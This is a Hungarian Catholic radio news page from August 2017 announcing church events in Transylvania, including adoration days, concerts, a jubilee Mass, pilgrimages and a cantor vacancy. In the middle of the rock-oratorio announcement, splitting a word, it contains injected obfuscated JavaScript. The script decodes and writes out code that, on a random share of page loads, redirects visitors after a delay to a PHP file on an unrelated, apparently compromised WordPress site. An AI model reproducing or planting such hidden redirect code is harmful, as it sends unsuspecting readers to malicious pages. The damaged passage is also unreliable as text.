2017. augusztus 17. – Hírek és programajánló

H Í R E K   E S T E

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében holnap Csicsókeresztúron tartják az örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, imádjuk Őt és engedjük, hogy jelenléte betöltse szívünket, egész lényünket.

Orgonamuzsikamaraton és toronymuzsika
A kolozsvári magyar napok keretén belül augusztus 19-én, szombaton orgonamuzsikamaratonra kerül sor a kolozsvári Szent Mihály templomban, délután kettő és hat óra között. Augusztus 20-án este hét órai kezdettel pedig toronymuzsika lesz a Szent Mihály templom tornyában a csíkszentsimoni Ifjúsági Fúvós Zenekar közreműkődésével, vezényel Sándor Árpád. Várnak minden zenekedvelőt.

Unless koncert Székelyudvarhelyen
Székelyudvarhelyen a Szent István-napi ünnepség lelkületéhez illő, dicsőítő koncertet tart augusztus 19-én, szombaton este hét órától a Debrecenből és Budapestről érkező UNLESS zenekar. A 2013-ban alakult csapat tagjai így vallanak magukról: „Keresztény elektropop, dance-pop, edm zenekar vagyunk. Célunk, hogy a modern zenei lehetőségeket is felhasználva megmozgassuk a fiatalokat, és elmondjuk, lehet boldog, szabad, álmokkal teli életet élni”. Várnak minden érdeklődő fiatalt!

Gyémántmise Csíksomlyón
Márk József ferenc atya hálát adva 60 év papi szolgálatáért augusztus 20-án, vasárnap, Szent István király ünnepén, este hét órakor a csíksomlyói kegytemplomban mutatja be gyémántmiséjét. József atya 47 éve szolgál a csíksomlyói kegyhelyen. Imádkozzunk érette kérve Isten áldását további szolgálatára.

XIV. Márton Áron zarándoklat
Szeptember 8-10 között immár 14. alkalommal rendeznek zarándoklatot, amely Áron püspök életének legfontosabb állomásait járja be: a szülőfalu Csíkszentdomokos, a börtönévek leghosszabb helyszíne Máramarossziget, a püspökszentelésnek helyet adó Kolozsvár és a püspöki székhely Gyulafehérvár. A zarándoklatot ezúttal is Kovács Gergely posztulátor és Ferencz Kornélia, az Erdélyi Mária Rádió munkatársa vezeti. Az autóbusz Székelyudvarhelyről indul és, Csíkszeredán is áthaladva, Csíkdánfalváig útközben felveszi azokat, akik ezt kérik. Jelentkezni a 0726-107.002-es vagy a 0744-472.178-as telefonszámokon lehetséges.

MRE – Hírszolgálat, 2017. augusztus 17.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a kolozsvári Szent Péter templomban tartják az örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, imádjuk Őt és engedjük, hogy jelenléte betöltse szívünket, egész lényünket.

Mária Rádiós önkéntes találkozók
Ma délután fél öt órától Kolozsváron várjuk önkénteseinket a Szent Mihály Nőszövetség dísztermében, majd holnap délután négy órától Nagykárolyban találkozunk az önkéntesekkel a Szent László közösségi házban.

Könyvbemutató Kolozsváron
A Kolozsvári Magyar Napok keretében holnap délután hat órakor a Szent Mihály Nőszövetség dísztermében bemutatásra kerül Frigyesy Ágnes Az Úr csodásan működik – Erdélyi nagy tanúságtevők című könyve. Bevezetőt mond Kovács Sándor főesperes-plébános. A kötet születésének körülményeiről vall a szerző, Frigyesy Ágnes. Közreműküdik Lakatos Fleisz Katalin, valamint Potyó István karnagy.

Családi nap és Mária áhitat Kovásznán
A Tündérvár Székely Nagycsaládosok Egyesülete és a kovásznai római katolikus egyházközség Szent István-napi családi napot szerveznek Kovásznán augusztus 19-én, szombaton, a helyi római katolikus templom kertjében. Délelőtt 10-13 óra között kézműves foglalkozásk lesznek. Ezt követően egy órától közös imaóra lesz a családokért a templomban, majd ebéd, délután három órától pedig családok, csoportok vetélkedője veszi kezdetét. Várják a családokat és minden érdeklődőt!
Ugyanakkor Kovásznán minden hónap harmadik szombatján Mária áhítatot tartanak szentmisével, rózsafüzérrel és gyertyás körmenettel. Hívják és várják a háromszékieket szombaton, augusztus 19-én, este hét órakor a helyi plébániatemplomba. Az imaalkalmat rádiónk élő adásba közvetíti.

Templombúcsú a temesvár-szabadfalui egyházközségben
A temesvár-szabadfalui római katolikus plébániához tartozó temessági közösség augusztus 19-én, szombaton ünnepli a templombúcsút. Az ünnepi szentmisét, amely déli fél tizenkettőkor kezdődik, Bakó László püspöki titkár celebrálja.
A szabadfalui római katolikus közösség augusztus 20-án, vasárnap ünnepli a Szent Rókus templom felszentelésének 240. évfordulóját és a templombúcsút. Az ünnepi liturgiát délelőtt tíz órakor Wonerth László kanonok mutatja be. A szentmisén énekel a szabadfalui templomkórus és a St. Gilgeni plébánia csoportja, orgonán játszik Cristian Roşoagă, közreműködik Lucian Furda hegedűművész. A szentmisét követően a plébánia udvarán szeretetvendégség lesz, muzsikál a Pink együttes.

„Szent László, légy velünk!” – rockoratórium és táncjáték
Az idei jubileumi év apropóján, a szent királyról szóló rockoratórium és táncjáték készül Szent László, légy velünk! címmel, amely Erdély védőszentjének rendkívül erős, pozitív személyiségét, nagyszerű cselekedeteit, és a köré fűződő legendakört fogja össze, óriásprodukcióként zenében, dalban, táncban. A rockoratórium történelmi tényekre, népi énekekre, zsoltárokra, valamint lovagkirályunkhoz kapcsolódó legendakörre épül.
E nagyszabású produkció megírására és bemutatására a 30 éves jubielumát ünneplő Role zenekar vállalkozott. A grfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andiózus bemutató előadás augusztus 20-án, este kilenc órától lesz Csíkszeredában, a Szabadság téren, melyre minden érdeklődőt várnak.

Szent László családi nap Nagyváradon
A Püspöki Palota kertjében Szent László Családi Napot tartanak augusztus 26-án, szombaton délután négy órától. A Szigligeti Társulat Bábszínházával és Táncegyüttesével, valamint a Szent László Iskola pedagógusaival együtt egy játékos délutánra, közös éneklésre, szabadtéri interaktív tevékenységre hívják a gyermekeket szüleik, nagyszüleik, testvéreik és barátaik kíséretében. A nagyváradiak mellett várják a környékbeli, vagy vidéki családokat is.

Lelkigyakorlat Székelyudvarhelyen
Szeptember 7-10. között a Szent Pio Lelkigyakorlatos Házban az abortusz fájdalmát hordozó, segítségre szoruló nők számára tartanak lelkigyakorlatot, „Ne félj, nem ítéllek el!” mottóval. Bővebb információ és bejelentkezés a 0751-830295 és a 0755-489743 telefonszámokon. A jelentkezésnek nem feltétele a rendszeres vallásgyakorlat. A megkeresést bizalmasan kezelik.

Kántori álláshírdetés
A dési „Páduai Szent Antal” római katolikus Plébánia Hivatal főállású, karvezetési tapasztalattal is rendelkező, kántort keres. Bérezés a jelenleg érvényben lévő Egyházmegyei- és a Munkatörvénykönyv rendelkezései szerint. A Plébánia bérmentes kétszobás szolgálati lakást és napi étkezést biztosít. Családos kántorok is jelentkezhetnek. Érdeklődni Benkő Ferenc plébánosnál lehet a 0746-224740-es telefonszámon. A jelentkezőket kérik, hogy a benkoferi@yahoo.com e-mail címre küldjék le a következő dokumentumok másolatait: önéletrajz, kántori végzettséget igazoló okirat, valamint plébánosi ajánlás a régi munkahelyről. Jelentkezési határidő: szeptember 15.

MRE - Hírszolgálat, 2017. augusztus 17.

About the author

maradmin

Leave a Comment